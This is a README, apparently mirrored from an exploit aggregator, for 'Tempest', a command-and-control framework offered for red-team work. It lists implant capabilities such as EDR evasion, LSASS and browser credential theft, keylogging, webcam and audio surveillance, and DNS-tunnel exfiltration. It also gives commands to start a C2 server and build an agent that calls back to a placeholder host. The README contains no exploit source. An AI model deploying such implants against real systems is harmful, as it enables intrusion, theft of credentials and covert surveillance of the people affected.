Share
## https://sploitus.com/exploit?id=679D9FA3-8ED7-5651-89FD-21CC5CFA27FF
โก Tempest C2 Framework
Advanced Post-Exploitation & Command-and-Control Framework
Features โข
Architecture โข
Quick Start โข
Modules โข
Agents โข
Pro Edition โข
License
---
## Overview
**Tempest** is a modular, cross-platform Command & Control (C2) framework engineered for professional red team operations and advanced adversary simulation. It provides encrypted agent communication, cross-platform implants, and an extensible post-exploitation module library โ all operated through a modern web GUI or CLI.
Built with operational security (OPSEC) as a first-class design constraint, Tempest implements malleable C2 profiles, AES-256-GCM encrypted communications, certificate pinning, and multi-layered evasion techniques.
> **โ ๏ธ Legal Disclaimer:** This software is intended for authorized security testing and research only. Unauthorized access to computer systems is illegal. Users are responsible for compliance with all applicable laws.
---
## Features
### Core (Open Source)
| Category | Capabilities |
|---|---|
| **C2 Server** | FastAPI HTTPS server, WebSocket support, SQLite persistence, malleable C2 profiles |
| **Encryption** | AES-256-GCM, certificate pinning, PSK authentication, mTLS |
| **Agents** | Go (cross-platform), Python beacon, Rust implant, C shellcode loaders |
| **Transport** | HTTP/HTTPS, DNS tunneling, domain fronting, fallback URLs, jitter |
| **Recon** | System enumeration, network scanning, process listing, AV detection |
| **Execution** | Shell commands, PowerShell (AMSI bypass), process listing |
| **File Ops** | Upload, download, directory listing |
| **Builder** | One-command agent compilation with embedded C2 config |
| **Web GUI** | Operator dashboard with real-time beacon management |
### Pro Edition (Licensed)
| Category | Capabilities |
|---|---|
| **EDR Evasion** | AMSI bypass, ETW patching, NTDLL unhooking, syscall whispering |
| **Injection** | Process hollowing, threadless injection, module stomping, phantom DLL hollowing |
| **Active Directory** | Kerberoasting, AS-REP roasting, DCSync, Pass-the-Hash, AD CS abuse |
| **Persistence** | Registry, scheduled tasks, WMI event subscriptions, COM hijacking |
| **Credential Theft** | LSASS dump, DPAPI decryption, browser credential extraction, SAM dump |
| **Lateral Movement** | WMI exec, SMB lateral, DCOM exec, token impersonation |
| **Privilege Escalation** | Token manipulation, named pipe impersonation, BYOVD EDR kill |
| **Advanced Evasion** | Sleep encryption, stack spoofing, hardware breakpoint evasion, call stack spoofing |
| **Polymorphic Builder** | Garble-based obfuscation for unique binary signatures per build |
---
## Architecture
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ OPERATOR โ
โ Web GUI / CLI / API โ
โโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ HTTPS / WSS
โโโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ TEMPEST C2 SERVER โ
โ โโโโโโโโโโโโ โโโโโโโโโโโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโ โ
โ โ FastAPI โ โ Beacon โ โ SQLite โ โ Malleable โ โ
โ โ Router โ โ Manager โ โ DB โ โ C2 Engine โ โ
โ โโโโโโโโโโโโ โโโโโโโโโโโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโ โ
โโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโผโโโโโโโโโโโโโ
โ โ โ
โโโโโโโโผโโโโโโโ โโโโผโโโโโโโ โโโโผโโโโโโโโโโโ
โ Go Agent โ โ Rust โ โ C Shellcode โ
โ (Primary) โ โ Implant โ โ Loaders โ
โโโโโโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโโโ
```
---
## Quick Start
### Prerequisites
- Python 3.10+
- Go 1.21+ (for Go agent compilation)
- pip
### Installation
```bash
git clone https://github.com/YOUR_USERNAME/tempest-c2.git
cd tempest-c2
pip install -r requirements.txt
```
### Start the C2 Server
```bash
python -m tempest server start --port 443
```
### Build an Agent
```bash
python -m tempest build go --c2 https://YOUR_C2_IP:443 --os windows --arch amd64
```
### Access the Web GUI
Navigate to `https://YOUR_C2_IP:443/gui` in your browser.
---
## Modules
Tempest ships with **80+ post-exploitation modules** organized by attack phase:
| Phase | Module Count | Examples |
|---|---|---|
| Reconnaissance | 8 | `recon`, `network_recon`, `ad_enum`, `edr_detect` |
| Execution | 6 | `shell`, `powershell`, `bof_loader`, `fileless` |
| Evasion | 12 | `amsi_bypass`, `etw_patch`, `unhook_ntdll`, `sleep_encrypt` |
| Credential Access | 8 | `lsass_dump`, `browser_stealer`, `dpapi_decrypt`, `credentials` |
| Lateral Movement | 6 | `wmi_lateral`, `lateral`, `ntlm_relay`, `pass_the_hash` |
| Persistence | 7 | `registry_persist`, `wmi_persist`, `persistence`, `fileless_persist` |
| Privilege Escalation | 5 | `privesc_win`, `privesc_linux`, `token_manip`, `byovd_edr_kill` |
| Collection | 5 | `keylogger`, `clipboard_monitor`, `camera`, `audio`, `surveillance` |
| Exfiltration | 3 | `exfiltration`, `dns_tunnel`, `socks_proxy` |
---
## Agents
### Go Agent (Primary)
The Go agent is the primary implant, supporting Windows, Linux, and macOS:
- AES-256-GCM encrypted C2 communication
- Anti-sandbox checks (timing, CPU, hostname, process blacklist)
- Native Win32 API screenshots (BitBlt)
- Clipboard stealing
- Keylogging (Windows low-level hooks)
- Registry/scheduled task/startup persistence
- Self-destruction capability
- Cross-compilation support
### Rust Implant
Stealth-optimized implant with:
- Direct syscall invocation
- LSASS memory dump
- Kerberos ticket forging
- ETW-TI blinding
### C Loaders
Shellcode execution primitives:
- XOR-encrypted shellcode runner
- Process injector
- DLL loader
- NTDLL unhooker
- Callstack spoofer
---
## Pro Edition
The **Tempest Pro** edition includes advanced offensive modules not available in the open-source release:
- **Advanced EDR bypass chain** โ automated multi-stage evasion
- **Active Directory attack suite** โ full Kerberoast โ DCSync โ Golden Ticket chain
- **Polymorphic agent builder** โ unique binary signature per compilation
- **Sleep encryption** โ memory page encryption during beacon sleep
- **Kernel-level capabilities** โ BYOVD driver loading for EDR neutralization
- **Priority support** โ direct access to the development team
**For licensing inquiries:** tempest-security@proton.me
---
## Configuration
Edit `config.yaml` to customize C2 behavior:
```yaml
c2:
http:
host: "0.0.0.0"
port: 443
use_tls: true
cert_file: "certs/server.crt"
key_file: "certs/server.key"
beacon_timeout: 300
malleable_profile: "jquery"
crypto:
aes_key: "" # Auto-generated if empty
```
---
## Project Structure
```
tempest-c2/
โโโ tempest/ # Core Python framework
โ โโโ agent/ # Python beacon agent
โ โโโ c2/ # C2 server (FastAPI + WebSocket)
โ โโโ cli/ # Command-line interface
โ โโโ core/ # Crypto, config, logging, plugins
โ โโโ modules/ # 80+ post-exploitation modules
โโโ agents/ # Compiled agent source
โ โโโ go_agent/ # Go cross-platform implant
โ โโโ rust_implant/ # Rust stealth implant
โ โโโ c_loaders/ # C shellcode loaders
โโโ docs/ # Documentation
โโโ config.yaml # Server configuration
โโโ main.py # Entry point
โโโ requirements.txt # Python dependencies
```
---
## Contributing
Contributions are welcome. Please read our contribution guidelines before submitting pull requests.
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/new-module`)
3. Commit changes (`git commit -am 'Add new module'`)
4. Push to branch (`git push origin feature/new-module`)
5. Open a Pull Request
---
## Acknowledgments
Built with modern offensive security research and techniques. Inspired by the red team community's continuous innovation in adversary simulation.
---
## License
This project is licensed under the [Business Source License 1.1](LICENSE).
- **Free** for personal research, education, and non-commercial security testing
- **Commercial license** required for production use in paid engagements
See [LICENSE](LICENSE) for full terms.
---
Built for authorized security professionals. Use responsibly.